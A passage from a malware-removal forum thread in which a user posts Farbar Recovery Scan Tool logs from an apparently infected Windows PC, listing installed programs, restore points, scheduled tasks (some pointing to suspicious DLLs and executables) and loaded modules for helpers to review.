- 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff2014-08-04 03:06 - 2014-08-14 
18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-25 10:57

==================== End Of Log ============================
jjoyner1985 Posted August 25, 2014 Author ID:871154

Addition

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-25 13:41:46
Running from F:\
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version: - Microsoft)
32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden
6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden
ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)
Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKCU\...\Akamai) (Version: - Akamai Technologies, Inc)
Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version: - Any-Video-Converter.com)
Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )
AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)
AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden
Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)
BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden
CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Thai (Version: 2007.0731.2233.38497 - ATI) Hidden
CCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hidden
ccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hidden
ccc-utility (Version: 2007.0731.2234.38497 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)
Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)
Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)
Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)
Destination Component (Version: 110.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) Hidden
DocMgr (Version: 120.0.000.000 - Hewlett-Packard) Hidden
DocProc (Version: 12.0.0.0 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version: - )
Fax (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Feedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)
Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)
GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)
HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)
HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)
HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)
HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 120.0.194.000 - Hewlett-Packard) Hidden
HTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)
iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)
iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)
Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) Hidden
MediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version: - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version: - Microsoft) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version: - Microsoft) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)
Network (Version: 120.0.194.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)
PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)
ProductContext (Version: 50.0.165.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - )
Roxio Creator Audio (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Copy (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Data (Version: 3.7.0 - Roxio) Hidden
Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
Roxio Creator DE (Version: 3.7.0 - Roxio) Hidden
Roxio Creator Tools (Version: 3.7.0 - Roxio) Hidden
Roxio Express Labeler 3 (Version: 3.2.1 - Roxio) Hidden
Roxio Update Manager (Version: 6.0.0 - Roxio) Hidden
SAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)
SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)
SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) Hidden
Scan (Version: 12.0.0.0 - Hewlett-Packard) Hidden
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)
Skins (Version: 2007.0731.2234.38497 - ATI) Hidden
SmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Status (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Toolbox (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Transporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)
TrayApp (Version: 120.0.194.000 - Hewlett-Packard) Hidden
UnloadSupport (Version: 11.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version: - Microsoft)
Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version: - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version: - Microsoft)
Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version: - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version: - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)
WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

==================== Restore Points =========================

29-07-2014 11:25:23 Scheduled Checkpoint
30-07-2014 11:45:57 Scheduled Checkpoint
01-08-2014 21:10:36 Scheduled Checkpoint
02-08-2014 16:42:56 Scheduled Checkpoint
04-08-2014 04:00:03 Scheduled Checkpoint
07-08-2014 22:48:19 Scheduled Checkpoint
11-08-2014 02:11:41 Scheduled Checkpoint
11-08-2014 15:01:42 Scheduled Checkpoint
12-08-2014 10:45:08 Scheduled Checkpoint
14-08-2014 02:36:25 Scheduled Checkpoint
14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14 17:59
14-08-2014 23:31:34 Advanced-System Protector
15-08-2014 23:47:04 Removed SofTest
16-08-2014 13:18:06 Removed DriverUpdate
16-08-2014 13:29:10 Removed HTC Sync.
16-08-2014 13:44:46 Removed HTC Sync.
16-08-2014 14:02:17 Removed HTC BMP USB Driver.
16-08-2014 16:47:50 Advanced-System Protector
16-08-2014 21:58:06 Installed AVG 2014
16-08-2014 22:11:41 Removed SlimCleaner Plus
16-08-2014 22:14:50 Removed HTC Driver Installer.
17-08-2014 19:56:09 Installed AVG 2014
17-08-2014 19:59:04 Installed AVG 2014
17-08-2014 20:03:04 Removed AVG 2014
17-08-2014 20:04:51 Installed AVG 2011
17-08-2014 21:08:16 Installed AVG 2014
17-08-2014 21:16:20 Installed AVG 2014
17-08-2014 21:24:43 Removed AVG 2014
17-08-2014 21:26:10 Installed AVG 2011
19-08-2014 21:04:48 Advanced-System Protector
21-08-2014 01:40:12 Advanced-System Protector
23-08-2014 20:47:11 Checkpoint by HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)
Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTION
Task: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exe
Task: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exe
Task: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)
Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)
Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServer
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exe
Task: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exe
Task: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)
Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)
Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll"

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe

==================== Loaded Modules (whitelisted) =============

2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll
2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll
2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll
2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll
2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll
2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll

==================== Alternate Data Streams (whitelisted)
=========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

